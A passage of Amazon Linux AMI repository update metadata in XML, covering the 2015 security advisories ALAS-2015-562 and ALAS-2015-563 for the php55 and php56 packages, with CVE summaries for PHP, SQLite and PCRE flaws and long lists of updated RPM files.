arch="i686"><filename>Packages/php54-dba-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.42" release="1.71.amzn1" epoch="0" 
arch="i686"><filename>Packages/php54-mbstring-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.42-1.71.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.42" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.42-1.71.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-562</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-562: medium priority package update for php55</title><issued date="2015-07-07 12:40:00" /><updated date="2015-07-07 22:40:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4644:
1234940:
CVE-2015-4644 php: segmentation fault in php_pgsql_meta_data()
CVE-2015-4643:
1234938:
CVE-2015-4643 php: integer overflow in ftp_genlist() resulting in heap overflow (improved fix for CVE-2015-4022)
CVE-2015-4642:
CVE-2015-3415:
The sqlite3VdbeExec function in vdbe.c in SQLite before 3.8.9 does not properly implement comparison operators, which allows context-dependent attackers to cause a denial of service (invalid free operation) or possibly have unspecified other impact via a crafted CHECK clause, as demonstrated by CHECK(0&amp;O&gt;O) in a CREATE TABLE statement.
1212356:
CVE-2015-3415 sqlite: invalid free() in src/vdbe.c
CVE-2015-3414:
SQLite before 3.8.9 does not properly implement the dequoting of collation-sequence names, which allows context-dependent attackers to cause a denial of service (uninitialized memory access and application crash) or possibly have unspecified other impact via a crafted COLLATE clause, as demonstrated by COLLATE"""""""" at the end of a SELECT statement.
1212353:
CVE-2015-3414 sqlite: use of uninitialized memory when parsing collation sequences in src/where.c
CVE-2015-2326:
1207202:
CVE-2015-2326 pcre: heap buffer overflow in pcre_compile2()
CVE-2015-2325:
1207198:
CVE-2015-2325 pcre: heap buffer overflow in compile_branch()
CVE-2014-3416:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3416" title="" id="CVE-2014-3416" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2325" title="" id="CVE-2015-2325" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2326" title="" id="CVE-2015-2326" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3414" title="" id="CVE-2015-3414" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3415" title="" id="CVE-2015-3415" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4642" title="" id="CVE-2015-4642" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4643" title="" id="CVE-2015-4643" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4644" title="" id="CVE-2015-4644" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-pspell" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.26" release="1.103.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php55-cli-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package 
name="php55-common" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.26" release="1.103.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php55-intl-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.26" release="1.103.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.26-1.103.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.26" release="1.103.amzn1" 
epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.26" 
release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.26-1.103.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.26" release="1.103.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.26-1.103.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-563</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-563: medium priority package update for php56</title><issued date="2015-07-07 12:40:00" /><updated date="2015-07-07 22:39:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4644:
1234940:
CVE-2015-4644 php: segmentation fault in php_pgsql_meta_data()
CVE-2015-4643:
1234938:
CVE-2015-4643 php: integer overflow in ftp_genlist() resulting in heap overflow (improved fix for CVE-2015-4022)
CVE-2015-4642:
CVE-2015-3415:
The sqlite3VdbeExec function in vdbe.c in SQLite before 3.8.9 does not properly implement comparison operators, which allows context-dependent attackers to cause a denial of service (invalid free operation) or possibly have unspecified other impact via a crafted CHECK clause, as demonstrated by CHECK(0&amp;O&gt;O) in a CREATE TABLE statement.
1212356:
CVE-2015-3415 sqlite: invalid free() in src/vdbe.c
CVE-2015-3414:
SQLite before 3.8.9 does not properly implement the dequoting of collation-sequence names, which allows context-dependent attackers to cause a denial of service (uninitialized memory access and application crash) or possibly have unspecified other impact via a crafted COLLATE clause, as demonstrated by COLLATE"""""""" at the end of a SELECT statement.
1212353:
CVE-2015-3414 sqlite: use of uninitialized memory when parsing collation sequences in src/where.c
CVE-2015-2326:
1207202:
CVE-2015-2326 pcre: heap buffer overflow in pcre_compile2()
CVE-2015-2325:
1207198:
CVE-2015-2325 pcre: heap buffer overflow in compile_branch()
CVE-2014-3416:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3416" title="" id="CVE-2014-3416" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2325" title="" id="CVE-2015-2325" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2326" title="" id="CVE-2015-2326" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3414" title="" id="CVE-2015-3414" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3415" title="" id="CVE-2015-3415" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4642" title="" id="CVE-2015-4642" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4643" title="" id="CVE-2015-4643" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4644" title="" id="CVE-2015-4644" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-common" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.10" 
release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.10" release="1.115.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" 
version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.10" release="1.115.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.10-1.115.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.10-1.115.amzn1.i686.rpm</filename></package><package 
name="php56-mysqlnd" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.10" release="1.115.amzn1" epoch="0" 
arch="i686"><filename>Packages/php56-gmp-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.10" release="1.115.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.10-1.115.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.10" 
